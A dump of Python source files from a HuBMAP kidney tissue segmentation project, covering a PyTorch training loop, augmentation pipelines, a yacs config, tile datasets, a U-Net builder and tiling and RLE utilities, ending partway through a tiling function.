repo_name stringlengths 6 97 | path stringlengths 3 341 | text stringlengths 8 1.02M |
|---|---|---|
GenoM87/hubmap | src/engine/fitter.py | import os, sys, time, warnings, datetime, gc
from collections import OrderedDict
import pandas as pd
import numpy as np
from tqdm import tqdm
import cv2
import torch
import torch.nn.functional as F
import albumentations as A
import rasterio
from utils import create_tile_v2, rle2mask, to_mask, global_shift_mask
from data_builder.transforms import get_valid_transform
from .average import AverageMeter
from models.optimizer import make_optimizer
from models.scheduler import make_scheduler
from models.loss import binary_xloss, dice_coefficient, dice_coeff
from models.SegLoss.losses_pytorch.dice_loss import SoftDiceLoss
class Fitter:
    """Training engine for the HuBMAP segmentation model.

    Owns the model, data loaders, optimizer, scheduler and checkpointing;
    drives the train/validate loop and the post-training evaluation passes.
    """

    def __init__(self, model, cfg, train_loader, val_loader, logger, exp_path):
        """Set up the training state.

        model: segmentation network (moved to cfg.DEVICE here)
        cfg: yacs config node with SOLVER/DATASET/MODEL sections
        train_loader / val_loader: torch DataLoaders over tile datasets
        logger: logging.Logger used for all progress messages
        exp_path: directory where checkpoints and outputs are written (created if missing)
        """
        self.experiment_path = exp_path
        os.makedirs(self.experiment_path, exist_ok=True)
        self.model = model.to(cfg.DEVICE)
        self.cfg = cfg
        self.train_loader = train_loader
        self.val_loader = val_loader
        self.logger = logger
        # Soft Dice loss as the training criterion.
        self.criterion = SoftDiceLoss()
        self.optimizer = make_optimizer(
            self.model, self.cfg
        )
        self.scheduler = make_scheduler(
            self.optimizer,
            self.cfg,
            self.train_loader
        )
        # Mutable training state — updated by train() and restored by load().
        self.epoch = 0           # index of the next epoch to run
        self.val_score = 0       # best validation dice seen so far
        self.best_threshold = 0  # binarisation threshold that produced val_score
        self.logger.info(f'Avvio training {datetime.datetime.now()} con i seguenti parametri:')
        self.logger.info(self.cfg)
def train(self):
#Start training loop
for epoch in range(self.epoch, self.cfg.SOLVER.NUM_EPOCHS):
if epoch < self.cfg.SOLVER.WARMUP_EPOCHS:
#Create increasing lr
lr = np.linspace(
start=self.cfg.SOLVER.MIN_LR,
stop=self.cfg.SOLVER.LR,
num=self.cfg.SOLVER.WARMUP_EPOCHS
)
for g in self.optimizer.param_groups:
g['lr'] = lr[epoch]
self.logger.info(f'[TRAIN]WARMUP: Increasing learning rate to {lr[epoch]}')
t = time.time()
summary_loss = self.train_one_epoch()
self.logger.info(
f'''[RESULT]: Train. Epoch: {self.epoch},
summary_loss: {summary_loss.avg:.5f},
time: {(time.time() - t):.3f}'''
)
valid_loss, valid_dice, best_thr = self.validate()
if self.cfg.SOLVER.SCHEDULER == 'ReduceLROnPlateau':
self.scheduler.step(valid_loss)
else:
self.scheduler.step()
self.logger.info(
f'''[RESULT]: Val. Epoch: {self.epoch},
validation_loss: {valid_loss.avg:.5f},
Best Score Threshold: {self.best_threshold:.2f},
Best Score: {valid_dice:.5f},
time: {(time.time() - t):.3f}'''
)
self.epoch += 1
if valid_dice > self.val_score:
self.model.eval()
self.save(
os.path.join(self.experiment_path, f'unet_best.ckpt'))
self.val_score = valid_dice
self.best_threshold = best_thr
    def train_one_epoch(self):
        """Train for one epoch over self.train_loader.

        Returns an AverageMeter holding the batch-size-weighted running loss.
        """
        self.model.train()
        summary_loss = AverageMeter()
        t = time.time()
        train_loader = tqdm(self.train_loader, total=len(self.train_loader), desc='Training')
        for step, (imgs, masks) in enumerate(train_loader):
            self.optimizer.zero_grad()
            batch_size = imgs.shape[0]
            imgs = imgs.to(self.cfg.DEVICE)
            # Masks arrive as (B, H, W); add a channel dim to match the model
            # output shape (B, 1, H, W).
            targets = masks.to(self.cfg.DEVICE).unsqueeze(1)
            prob = self.model(imgs)
            loss = self.criterion(prob, targets)
            loss.backward()
            self.optimizer.step()
            # Store a detached python float, weighted by batch size.
            summary_loss.update(loss.detach().cpu().item(), batch_size)
            train_loader.set_description(
                f'Train Step {step}/{len(self.train_loader)}, ' + \
                f'Learning rate {self.optimizer.param_groups[0]["lr"]}, ' + \
                f'summary_loss: {summary_loss.avg:.5f}, ' + \
                f'time: {(time.time() - t):.3f}'
            )
        return summary_loss
def validate(self):
self.model.eval()
t = time.time()
summary_loss = AverageMeter()
val_loader = tqdm(self.val_loader, total=len(self.val_loader), desc='Valid')
valid_probability = []
valid_mask = []
for step, (imgs, masks) in enumerate(val_loader):
targets = masks.to(self.cfg.DEVICE)
imgs = imgs.to(self.cfg.DEVICE)
batch_size = imgs.shape[0]
with torch.no_grad():
prob = self.model(imgs).squeeze()
loss = self.criterion(prob, targets)
summary_loss.update(loss, batch_size)
valid_probability.append(prob.detach().cpu().numpy())
valid_mask.append(targets.detach().cpu().numpy())
val_loader.set_description(
f'Valid Step {step}/{len(self.val_loader)}, ' + \
f'Learning rate {self.optimizer.param_groups[0]["lr"]}, ' + \
f'summary_loss: {summary_loss.avg:.5f}, ' + \
f'time: {(time.time() - t):.3f}'
)
probability = np.concatenate(valid_probability)
mask = np.concatenate(valid_mask)
act_dice = 0
best_dice = 0
for thr in np.linspace(0, 1, num=20):
pred = (probability>thr).astype(np.uint8)
act_dice = dice_coefficient(pred, mask)
if act_dice>best_dice:
self.logger.info(
f'[VALID]Epoch: {self.epoch} Found best dice at thr {thr}: {act_dice}'
)
best_thr = thr
best_dice = act_dice
self.best_threshold = best_thr
return summary_loss, best_dice, best_thr
def save(self, path):
self.model.eval()
torch.save({
'model_state_dict': self.model.state_dict(),
'optimizer_state_dict': self.optimizer.state_dict(),
'scheduler_state_dict': self.scheduler.state_dict(),
'best_threshold': self.best_threshold,
'val_score': self.val_score,
'epoch': self.epoch,
}, path)
def save_model(self, path):
self.model.eval()
torch.save({
'model_state_dict': self.model.state_dict(),
'best_threshold': self.best_threshold,
'val_score': self.val_score,
}, path)
    def load(self, path):
        """Restore a checkpoint written by save(), resuming training state.

        Sets self.epoch to the saved epoch + 1 so training continues from
        the epoch after the checkpointed one.
        """
        checkpoint = torch.load(path)
        self.model.load_state_dict(checkpoint['model_state_dict'])
        self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
        self.scheduler.load_state_dict(checkpoint['scheduler_state_dict'])
        self.best_threshold = checkpoint['best_threshold']
        self.val_score = checkpoint['val_score']
        self.epoch = checkpoint['epoch'] + 1
def final_check(self):
ckpt = torch.load(self.cfg.MODEL.CHECKPOINT_PATH)
if 'model_state_dict' in list(ckpt.keys()):
self.load(self.cfg.MODEL.CHECKPOINT_PATH)
else:
state_dict = ckpt['state_dict']
state = OrderedDict([(key.split("model.")[-1], state_dict[key]) for key in state_dict])
self.model.load_state_dict(state)
del ckpt, state, state_dict
gc.collect()
self.model = self.model.to(self.cfg.DEVICE)
self.model.eval()
t = time.time()
norm = A.Normalize()
df = pd.read_csv(
os.path.join(self.cfg.DATA_DIR, 'train.csv')
)
for img_id in self.cfg.DATASET.VALID_ID:
#Tile creation per l'immagine phase=valid per usare i parametri di test
tile = create_tile_v2(
img_id, df, self.cfg, phase='valid'
)
path_img = os.path.join(
self.cfg.DATA_DIR, 'train', img_id+'.tiff'
)
identity = rasterio.Affine(1, 0, 0, 0, 1, 0)
dataset = rasterio.open(path_img, transform=identity, num_threads = 'all_cpus',)
h, w = dataset.shape
encoding = df[df['id']==img_id]['encoding'].values[0]
#CREO LA MASCHERA E RIDEFINISCO h,w
mask = rle2mask(encoding, (w, h))
mask = cv2.resize(
mask, dsize=None,
fx=self.cfg.DATASET.IMG_SCALE,
fy=self.cfg.DATASET.IMG_SCALE,
interpolation=cv2.INTER_AREA
)
h, w = mask.shape
tile_image = tile['img_tile']
tile_image = np.stack(tile_image)[..., ::-1]
tile_image = norm(image=tile_image)['image']
tile_image = np.ascontiguousarray(tile_image.transpose(0,3,1,2))
batch = np.array_split(tile_image, len(tile_image)//4)
tile_prob = []
#itero per tutti i batch
for num, imgs in enumerate(batch):
imgs = torch.from_numpy(imgs).to(self.cfg.DEVICE)
p = []
with torch.no_grad():
#plain image
y_hat = self.model(imgs)
p.append(torch.sigmoid(y_hat))
#horizontal flip
y_hat = self.model(imgs.flip(dims=(2,)))
p.append(torch.sigmoid(y_hat.flip(dims=(2,))))
#vertical flip
y_hat = self.model(imgs.flip(dims=(3,)))
p.append(torch.sigmoid(y_hat.flip(dims=(3,))))
p = torch.stack(p).mean(0)
tile_prob.append(p.data.detach().cpu().numpy())
tile_prob = np.concatenate(tile_prob).squeeze()
mask_pred = to_mask(
tile_prob,
tile['coord'],
h,
w,
self.cfg.DATASET.TEST_TILE_SIZE
)
predict = (mask_pred>self.best_threshold).astype(np.float32)
base_dice = dice_coefficient(predict, mask)
self.logger.warning(f'''
[VALID]Immagine: {img_id}, Dice Coeff con threshold {self.best_threshold}: {base_dice}
''')
self.logger.warning(f'[VALID]Avvio ricerca best thr per immagine {img_id}')
for thr in np.linspace(0, 1, 21):
predict = (mask_pred>thr).astype(np.float32)
dice = dice_coefficient(predict, mask)
if dice>base_dice:
base_dice=dice
self.best_threshold = thr
self.logger.warning(f'''
[VALID]Immagine: {img_id}, Dice Coeff finale con threshold {self.best_threshold}: {base_dice}
''')
#Scrittura con previsioni finali
predict = (mask_pred>self.best_threshold).astype(np.float32)
#Scrittura delle immagini finali
cv2.imwrite(
os.path.join(self.experiment_path, img_id+'.probability.png'), mask_pred*255
)
cv2.imwrite(
os.path.join(self.experiment_path, img_id+'.predict.png'), predict*255
)
cv2.imwrite(
os.path.join(self.experiment_path, img_id+'.mask.png'), mask*255
)
def compute_shift(self):
ckpt = torch.load(self.cfg.MODEL.CHECKPOINT_PATH)
if 'model_state_dict' in list(ckpt.keys()):
self.load(self.cfg.MODEL.CHECKPOINT_PATH)
else:
state_dict = ckpt['state_dict']
state = OrderedDict([(key.split("model.")[-1], state_dict[key]) for key in state_dict])
self.model.load_state_dict(state)
del ckpt, state, state_dict
gc.collect()
self.model = self.model.to(self.cfg.DEVICE)
self.model.eval()
t = time.time()
norm = A.Normalize()
df = pd.read_csv(
os.path.join(self.cfg.DATA_DIR, 'train.csv')
)
f = open(
os.path.join(self.experiment_path, 'compute_shift.txt'), 'a'
)
for img_id in list(df['id']):
#Tile creation per l'immagine phase=valid per usare i parametri di test
tile = create_tile_v2(
img_id, df, self.cfg, phase='valid'
)
path_img = os.path.join(
self.cfg.DATA_DIR, 'train', img_id+'.tiff'
)
identity = rasterio.Affine(1, 0, 0, 0, 1, 0)
dataset = rasterio.open(path_img, transform=identity, num_threads = 'all_cpus',)
h, w = dataset.shape
encoding = df[df['id']==img_id]['encoding'].values[0]
#CREO LA MASCHERA E RIDEFINISCO h,w
mask = rle2mask(encoding, (w, h))
mask = cv2.resize(
mask, dsize=None,
fx=self.cfg.DATASET.IMG_SCALE,
fy=self.cfg.DATASET.IMG_SCALE,
interpolation=cv2.INTER_AREA
)
h, w = mask.shape
tile_image = tile['img_tile']
tile_image = np.stack(tile_image)[..., ::-1]
tile_image = norm(image=tile_image)['image']
tile_image = np.ascontiguousarray(tile_image.transpose(0,3,1,2))
batch = np.array_split(tile_image, len(tile_image)//4)
tile_prob = []
#itero per tutti i batch
for num, imgs in enumerate(batch):
imgs = torch.from_numpy(imgs).to(self.cfg.DEVICE)
p = []
with torch.no_grad():
#plain image
y_hat = self.model(imgs)
p.append(torch.sigmoid(y_hat))
#horizontal flip
y_hat = self.model(imgs.flip(dims=(2,)))
p.append(torch.sigmoid(y_hat.flip(dims=(2,))))
#vertical flip
y_hat = self.model(imgs.flip(dims=(3,)))
p.append(torch.sigmoid(y_hat.flip(dims=(3,))))
p = torch.stack(p).mean(0)
tile_prob.append(p.data.detach().cpu().numpy())
tile_prob = np.concatenate(tile_prob).squeeze()
mask_pred = to_mask(
tile_prob,
tile['coord'],
h,
w,
self.cfg.DATASET.TEST_TILE_SIZE
)
predict = (mask_pred>self.best_threshold).astype(np.float32)
shift_x = np.linspace(-25, 25, 51, dtype=int)
shift_y = np.linspace(-25, 25, 51, dtype=int)
best_score = dice_coefficient(predict, mask)
f.write(f'Starting search for image: {img_id} with dice: {best_score}')
for sh_x in shift_x:
for sh_y in shift_y:
pred_shft = global_shift_mask(predict, y_shift=sh_y, x_shift=sh_x)
dice_shft = dice_coefficient(pred_shft, mask)
if dice_shft>=best_score:
f.write(f'Better shifting found {img_id} - x: {sh_x}, y: {sh_y}, dice: {dice_shft:.4f} \n')
best_score = dice_shft
f.close()
|
GenoM87/hubmap | src/data_builder/transforms.py | import cv2
import albumentations as A
from albumentations.pytorch import ToTensorV2
def get_train_transform(cfg):
    """Training augmentation pipeline.

    Colour jitter (HSV / CLAHE), flips and 90-degree rotations,
    shift-scale-rotate, then resize, normalise and convert to tensor.
    Probabilities come from cfg.DATASET.P_* settings.
    """
    return A.Compose([
        # Geometric distortions kept disabled (experimented with, then turned off).
        #A.OneOf([
        #    A.OpticalDistortion(p=cfg.DATASET.P_OPTICAL_DIST),
        #    A.GridDistortion(p=cfg.DATASET.P_GRID_DIST),
        #    A.IAAPiecewiseAffine(p=cfg.DATASET.P_PIECEWISE_AFFINE),
        #], p=0.3),
        A.OneOf([
            A.HueSaturationValue(10,15,10, p=cfg.DATASET.P_HUE_SATURATION),
            A.CLAHE(clip_limit=2, p=cfg.DATASET.P_CLAHE),
            #A.RandomBrightnessContrast(p=cfg.DATASET.P_RANDOM_BRIGHTNESS),
        ], p=0.3),
        A.HorizontalFlip(cfg.DATASET.P_HORIZONATL_FLIP),
        A.VerticalFlip(cfg.DATASET.P_VERTICAL_FLIP),
        A.RandomRotate90(cfg.DATASET.P_RANDOM_ROTATE),
        A.ShiftScaleRotate(
            shift_limit=0.0625, scale_limit=0.2, rotate_limit=15, p=cfg.DATASET.P_SHIFT_SCALE,
            border_mode=cv2.BORDER_REFLECT
        ),
        A.Resize(height=cfg.DATASET.IMG_HEIGHT, width=cfg.DATASET.IMG_WIDTH),
        A.Normalize(),
        ToTensorV2()
    ])
def get_valid_transform(cfg):
    """Validation pipeline: normalise and convert to tensor only.

    No resize — validation tiles are already at the expected size
    (the resize line was deliberately disabled).
    """
    return A.Compose([
        #A.Resize(height=cfg.DATASET.IMG_HEIGHT, width=cfg.DATASET.IMG_WIDTH),
        A.Normalize(),
        ToTensorV2()
    ])
def get_test_transform(cfg):
    """Test-time pipeline: resize to the configured size, normalise, to tensor."""
    return A.Compose([
        A.Resize(height=cfg.DATASET.IMG_HEIGHT, width=cfg.DATASET.IMG_WIDTH),
        A.Normalize(),
        ToTensorV2()
    ])
GenoM87/hubmap | src/config.py | <reponame>GenoM87/hubmap<filename>src/config.py
import pathlib
import os
import torch
from yacs.config import CfgNode as CN
# GENERAL CONFIG
_C = CN()
_C.PROJECT_DIR = str(pathlib.Path(__file__).parent.parent.absolute())
_C.DATA_DIR = os.path.join(_C.PROJECT_DIR, 'data')
_C.DEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'

# Dataset config
_C.DATASET = CN()

# TILE CREATION
_C.DATASET.IMG_SCALE = 0.25            # downscale factor applied to the source TIFFs
_C.DATASET.TRAIN_TILE_SIZE = 320       # tile side (px, at working scale)
_C.DATASET.TRAIN_TILE_AVG_STEP = 160   # average stride between tile centres
_C.DATASET.TRAIN_TILE_MIN_SCORE = 0.25 # min tissue-saturation score to keep a tile
_C.DATASET.TEST_TILE_SIZE = 320
_C.DATASET.TEST_TILE_AVG_STEP = 160
_C.DATASET.TEST_TILE_MIN_SCORE = 0.25
# Tile folder name encodes the tiling parameters so runs don't collide.
_C.DATASET.TILE_DIR = os.path.join(
    _C.DATA_DIR,
    'train',
    f'{_C.DATASET.IMG_SCALE}_{_C.DATASET.TRAIN_TILE_MIN_SCORE}_{_C.DATASET.TRAIN_TILE_SIZE}_{_C.DATASET.TRAIN_TILE_AVG_STEP}_train'
)
# Image ids held out for validation.
_C.DATASET.VALID_ID = '54f2eec69', 'aaa6a05cc'
_C.DATASET.TEST_DIR = os.path.join(
    _C.DATA_DIR,
    'test',
    f'{_C.DATASET.IMG_SCALE}_{_C.DATASET.TEST_TILE_MIN_SCORE}_{_C.DATASET.TEST_TILE_SIZE}_{_C.DATASET.TEST_TILE_AVG_STEP}_test'
)

# DATASET AUGMENTATION (probabilities for the albumentations pipeline)
_C.DATASET.IMG_HEIGHT = 256
_C.DATASET.IMG_WIDTH = 256
_C.DATASET.H_FLIP_PROB = 0.3
_C.DATASET.P_OPTICAL_DIST = 0.3
_C.DATASET.P_GRID_DIST = 0.3
_C.DATASET.P_PIECEWISE_AFFINE = 0.3
_C.DATASET.P_HUE_SATURATION = 0.3
_C.DATASET.P_CLAHE = 0.3
_C.DATASET.P_RANDOM_BRIGHTNESS = 0.3
_C.DATASET.P_HORIZONATL_FLIP = 0.3
_C.DATASET.P_VERTICAL_FLIP = 0.3
_C.DATASET.P_RANDOM_ROTATE = 0.3
_C.DATASET.P_SHIFT_SCALE = 0.3
_C.DATASET.NUM_WORKERS = 2

# Loader config
_C.TRAIN_LOADER = CN()
_C.TRAIN_LOADER.BATCH_SIZE = 32
_C.TRAIN_LOADER.NUM_WORKERS = 4
_C.VALID_LOADER = CN()
_C.VALID_LOADER.BATCH_SIZE = 32
_C.VALID_LOADER.NUM_WORKERS = 4

# Solver config
_C.SOLVER = CN()
_C.SOLVER.NUM_EPOCHS = 60
_C.SOLVER.WARMUP_EPOCHS = 10
#'Adam', SGD, Ranger, RangerQH (quasi hyperbolic momentum), RangerALR (adaptive learning rate)
_C.SOLVER.OPTIMIZER = 'RangerALR'
_C.SOLVER.SCHEDULER = 'CosineAnnealingLR'
_C.SOLVER.SCHEDULER_MODE = 'max'
_C.SOLVER.LR = 1e-03
_C.SOLVER.MIN_LR = 1e-05
_C.SOLVER.WEIGHT_DECAY = 0
_C.SOLVER.BETAS = (0.9, 0.999)
_C.SOLVER.AMSGRAD = True
# ReduceLROnPlateau parameters
_C.SOLVER.SCHEDULER_REDFACT = 0.1
_C.SOLVER.SCHEDULER_PATIENCE = 3
# CosineAnnealing parameters
_C.SOLVER.SCHEDULER_COS_CPOCH = 2
_C.SOLVER.SCHEDULER_T_MUL = 2
_C.SOLVER.T_MAX = 6  # T_max for CosineAnnealingLR

# Model config
_C.MODEL = CN()
_C.MODEL.NAME = 'resnet34'
_C.MODEL.PRETRAINING = 'imagenet'
_C.MODEL.ATTENTION = True
_C.MODEL.CHECKPOINT_PATH = '/home/giorgio/Scrivania/Kaggle/hubmap/experiments/resnet34/2020-12-30/unet_best.ckpt'
GenoM87/hubmap | src/data_builder/dataset.py | import os
import datetime
import pandas as pd
import numpy as np
import cv2
import matplotlib.pyplot as plt
import torch
from torch.utils.data import Dataset, DataLoader
import albumentations as A
class hmTrainDataset(Dataset):
    """Dataset over pre-generated training tiles (image + mask PNG pairs).

    Tiles live under cfg.DATASET.TILE_DIR/<image_id>/ and are addressed by
    their centre coordinates (cx, cy) taken from the coord dataframe.
    """

    def __init__(self, df, img_ids, cfg, transforms=None, preprocessing=None):
        """df: coord dataframe with image_id/cx/cy columns;
        img_ids: image ids to include (rows are filtered to these)."""
        self.img_ids = img_ids
        self.df = df[df['image_id'].isin(img_ids)]
        self.cfg = cfg
        self.tile_dir = cfg.DATASET.TILE_DIR
        self.transforms = transforms
        self.preprocessing = preprocessing

    def __len__(self):
        # One sample per tile row in the filtered dataframe.
        return self.df.shape[0]

    def __getitem__(self, idx:int):
        """Load the tile image and its mask, apply transforms; returns (img, mask)."""
        row = self.df.iloc[idx]
        path_img = os.path.join(
            self.tile_dir,
            row['image_id']
        )
        # NOTE(review): cv2.imread returns None for a missing file — assumes
        # the tile PNGs were generated beforehand by create_tile.py; verify.
        img = cv2.imread(
            os.path.join(path_img, 'x'+str(row['cx'])+'_y'+str(row['cy'])+'.png'),
            cv2.IMREAD_COLOR
        )
        mask = cv2.imread(
            os.path.join(path_img, 'x'+str(row['cx'])+'_y'+str(row['cy'])+'.mask.png'),
            cv2.IMREAD_GRAYSCALE
        )
        if self.transforms:
            augmented = self.transforms(image=img, mask=mask)
            img = augmented['image']
            mask = augmented['mask']
        if self.preprocessing:
            preprocessed = self.preprocessing(image=img, mask=mask)
            img = preprocessed['image']
            mask = preprocessed['mask']
        return img, mask
class hmTestDataset(Dataset):
    """Dataset over pre-generated tiles without masks (submission/inference)."""

    def __init__(self, df, img_ids, cfg, transforms=None, preprocessing=None):
        """df: coord dataframe with image_id/cx/cy columns;
        img_ids: image ids to include (rows are filtered to these)."""
        self.img_ids = img_ids
        self.df = df[df['image_id'].isin(img_ids)]
        self.cfg = cfg
        self.tile_dir = cfg.DATASET.TILE_DIR
        self.transforms = transforms
        self.preprocessing = preprocessing

    def __len__(self):
        # One sample per tile row in the filtered dataframe.
        return self.df.shape[0]

    def __getitem__(self, idx:int):
        """Load and transform a single tile image; returns the image only."""
        row = self.df.iloc[idx]
        path_img = os.path.join(
            self.tile_dir,
            row['image_id']
        )
        img = cv2.imread(
            os.path.join(path_img, 'x'+str(row['cx'])+'_y'+str(row['cy'])+'.png'),
            cv2.IMREAD_COLOR
        )
        if self.transforms:
            augmented = self.transforms(image=img)
            img = augmented['image']
        if self.preprocessing:
            preprocessed = self.preprocessing(image=img)
            img = preprocessed['image']
        return img
GenoM87/hubmap | src/models/model.py | import segmentation_models_pytorch as smp
from config import _C as cfg
def build_model(cfg):
    """Build a single-class U-Net from segmentation_models_pytorch.

    Uses cfg.MODEL.NAME as the encoder and cfg.MODEL.PRETRAINING as its
    weights; when cfg.MODEL.ATTENTION is set, enables 'scse' decoder
    attention. Output activation is sigmoid, so the network returns
    probabilities (use activation=None to get logits instead).
    """
    # Deduplicated: the two branches differed only in decoder_attention_type.
    kwargs = dict(
        encoder_name=cfg.MODEL.NAME,
        encoder_weights=cfg.MODEL.PRETRAINING,
        in_channels=3,
        classes=1,
        activation='sigmoid',
    )
    if cfg.MODEL.ATTENTION:
        kwargs['decoder_attention_type'] = 'scse'
    return smp.Unet(**kwargs)
GenoM87/hubmap | src/utils.py | import os
import cv2
import numpy as np
import tifffile as tiff
import rasterio
from rasterio.windows import Window
identity = rasterio.Affine(1, 0, 0, 0, 1, 0)
def mask2rle(img):
    '''
    Encode a binary mask as a run-length string.

    img: numpy array, 1 - mask, 0 - background (scanned column-major,
    i.e. down each column first, 1-indexed starts)
    Returns run length as string formated
    '''
    # Pad with zeros on both ends so every run has a start and an end transition.
    flat = np.concatenate(([0], img.T.reshape(-1), [0]))
    # Indices (1-based) where the value changes: run starts and run ends alternate.
    transitions = np.flatnonzero(flat[1:] != flat[:-1]) + 1
    # Turn every (start, end) pair into (start, length).
    transitions[1::2] -= transitions[::2]
    return ' '.join(map(str, transitions))
def rle2mask(mask_rle, shape=(1600,256)):
    '''
    Decode a run-length string into a binary mask.

    mask_rle: run-length as string formated (start length), 1-indexed,
    column-major order
    shape: (width,height) of array to return
    Returns numpy array of shape (height, width), 1 - mask, 0 - background
    '''
    tokens = np.asarray(mask_rle.split(), dtype=int)
    begins = tokens[0::2] - 1       # convert 1-based starts to 0-based
    run_lengths = tokens[1::2]
    flat = np.zeros(shape[0] * shape[1], dtype=np.uint8)
    for begin, end in zip(begins, begins + run_lengths):
        flat[begin:end] = 1
    # Reshape as (width, height) then transpose to undo the column-major scan.
    return flat.reshape(shape).T
def read_tiff(img_path):
    """Read a TIFF image and return it as a contiguous HWC uint array.

    Squeezes singleton dims; if the file is channel-first (3, H, W) it is
    transposed to (H, W, 3).
    """
    img = tiff.imread(img_path)
    img = np.squeeze(img)
    if img.shape[0]==3:
        # Channel-first layout -> channel-last.
        img = img.transpose(1,2,0)
    img = np.ascontiguousarray(img)
    return img
def create_tile_v2(img_id, df, cfg, phase='train'):
    '''
    Tile one image (and its RLE mask) using rasterio windowed reads, so the
    full-resolution TIFF never has to fit in memory.

    img_id: image id (file <DATA_DIR>/train/<img_id>.tiff)
    df: dataframe with 'id' and 'encoding' (RLE) columns
    cfg: yacs config; phase selects TRAIN_* or TEST_* tiling parameters
    Returns a dict with kept tile coords ('coord'), rejected coords
    ('reject'), image tiles ('img_tile') and mask tiles ('mask_tile').
    Coordinates are stored at the working (rescaled) resolution.
    '''
    # Tiling parameters (rescaled below to full-resolution pixel units).
    img_scale = cfg.DATASET.IMG_SCALE
    if phase=='train':
        tile_min_score = cfg.DATASET.TRAIN_TILE_MIN_SCORE
        tile_size = cfg.DATASET.TRAIN_TILE_SIZE
        tile_avg_step = cfg.DATASET.TRAIN_TILE_AVG_STEP
    else:
        tile_min_score = cfg.DATASET.TEST_TILE_MIN_SCORE
        tile_size = cfg.DATASET.TEST_TILE_SIZE
        tile_avg_step = cfg.DATASET.TEST_TILE_AVG_STEP

    # Work in full-resolution pixels; the configured sizes are post-rescale.
    tile_size = tile_size / img_scale
    tile_avg_step = tile_avg_step / img_scale
    half = int(tile_size // 2)

    # NOTE(review): both branches read from the 'train' folder — presumably
    # intentional since test images aren't annotated; confirm.
    if phase=='train':
        path_img = os.path.join(cfg.DATA_DIR, 'train', img_id+'.tiff')
    else:
        path_img = os.path.join(cfg.DATA_DIR, 'train', img_id+'.tiff')

    dataset = rasterio.open(path_img, transform=identity, num_threads = 'all_cpus')
    h, w = dataset.shape

    # Build the full-resolution mask from the RLE encoding.
    rle = df.loc[df['id']==img_id]['encoding'].values[0]
    mask = rle2mask(rle, (w, h))

    # Grid of tile centres covering the image.
    coord_x = np.linspace(half, w-half, int(np.ceil((w-tile_size)/tile_avg_step)), dtype=int)
    coord_y = np.linspace(half, h-half, int(np.ceil((h-tile_size)/tile_avg_step)), dtype=int)

    coord = []
    reject = []
    tile_img = []
    tile_mask = []
    for cy in coord_y:
        for cx in coord_x:
            # Windowed read of the tile from the original TIFF (bands 1-3).
            img = dataset.read(
                [1,2, 3],
                window=Window.from_slices((cy-half, cy+half), (cx-half, cx+half))
            ).transpose(1,2,0)
            mask_t = mask[cy-half:cy+half, cx-half:cx+half]
            # Resize tile and mask down to the working scale.
            img = cv2.resize(
                img,
                dsize=None,
                fx=img_scale,
                fy=img_scale,
                interpolation = cv2.INTER_AREA
            )
            mask_t = cv2.resize(
                mask_t,
                dsize=None,
                fx=img_scale,
                fy=img_scale,
                interpolation = cv2.INTER_AREA
            )
            # Reject tiles with too little tissue: score = fraction of pixels
            # whose HSV saturation exceeds 32.
            structure = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
            structure = (structure[:, :, 1] > 32).astype(np.uint8)
            structure = structure.astype(np.float32)
            curr_val = structure.mean()
            if curr_val>tile_min_score:
                coord.append([int(cx*img_scale), int(cy*img_scale), curr_val])
                tile_img.append(img)
                tile_mask.append(mask_t)
            else:
                reject.append([int(cx*img_scale), int(cy*img_scale), curr_val])
    return {
        'coord': coord,
        'reject': reject,
        'img_tile': tile_img,
        'mask_tile': tile_mask
    }
def create_tile(img, mask, img_scale, tile_min_score, tile_size, tile_avg_step):
    '''
    In-memory tiling: resize the whole image/mask first, then cut tiles.

    img: tiff img full shape (H,W,C)
    mask: mask come from rle_decode (H,W)
    img_scale: scale to resize original image
    img_min_score: filter image with min score (prevent empty tile)
    tile_size: size of the tile (at the rescaled resolution)
    tile_avg_step: average step for tile creation
    Returns a dict with tile coords, rejected coords, the resized image/mask,
    the tissue-score map and the tile lists.
    '''
    half = tile_size//2
    #TODO: try other interpolations (INTER_LINEAR etc.)
    img_small = cv2.resize(img, dsize=None, fx=img_scale, fy=img_scale, interpolation = cv2.INTER_AREA)
    mask_small = cv2.resize(mask.astype(np.uint8), dsize=None, fx=img_scale, fy=img_scale, interpolation = cv2.INTER_AREA)
    # Tissue score: fraction of pixels with HSV saturation above 32.
    structure = cv2.cvtColor(img_small, cv2.COLOR_RGB2HSV)
    structure = (structure[:, :, 1] > 32).astype(np.uint8)
    structure = structure.astype(np.float32)
    h, w, _ = img_small.shape
    # Grid of tile centres covering the rescaled image.
    coord_x = np.linspace(half, w-half, int(np.ceil((w-tile_size)/tile_avg_step)), dtype=int)
    coord_y = np.linspace(half, h-half, int(np.ceil((h-tile_size)/tile_avg_step)), dtype=int)
    coord = []
    reject = []
    for cy in coord_y:
        for cx in coord_x:
            # Skip tiles that contain (almost) no tissue.
            curr_val = structure[cy-half:cy+half, cx-half:cx+half].mean()
            if curr_val>tile_min_score:
                coord.append([cx, cy, curr_val])
            else:
                reject.append([cx, cy, curr_val])
    # Cut the accepted tiles out of the resized image/mask.
    tile_mask = []
    tile_img = []
    for cx, cy, cv in coord:
        im = img_small[cy-half:cy+half,cx-half:cx+half]
        ms = mask_small[cy-half:cy+half,cx-half:cx+half]
        tile_img.append(im)
        tile_mask.append(ms)
    return {
        'coord': coord,
        'reject': reject,
        'img': img_small,
        'img_tile': tile_img,
        'structure': structure,
        'mask_small': mask_small,
        'mask_tile': tile_mask
    }
def create_tile_subm_v2(img_id, img_scale, tile_min_score, tile_size, tile_avg_step):
    '''
    Rasterio-based tiling for prediction/submission time (no mask available).

    img_id: image id (reads <DATA>/<img_id>.tiff)
    img_scale / tile_min_score / tile_size / tile_avg_step: see create_tile_v2
    Returns a dict with kept tile coords ('coord'), rejected coords
    ('reject') and the image tiles ('img_tile').
    '''
    # Work in full-resolution pixel units; coords are rescaled when stored.
    tile_size = tile_size / img_scale
    tile_avg_step = tile_avg_step / img_scale
    # BUGFIX: keep `half` integral — tile_size is a float after rescaling,
    # and float offsets would break the window slices below.
    half = int(tile_size // 2)
    # NOTE(review): DATA is not defined in this module — presumably a global
    # set in the submission notebook; confirm before reuse.
    path_img = os.path.join(DATA, img_id+'.tiff')
    # BUGFIX: keyword was misspelled `trasform`, so the identity transform
    # was silently ignored by rasterio.open.
    dataset = rasterio.open(path_img, transform=identity, num_threads='all_cpus')
    h, w = dataset.shape
    # Grid of tile centres covering the image.
    coord_x = np.linspace(half, w-half, int(np.ceil((w-tile_size)/tile_avg_step)), dtype=int)
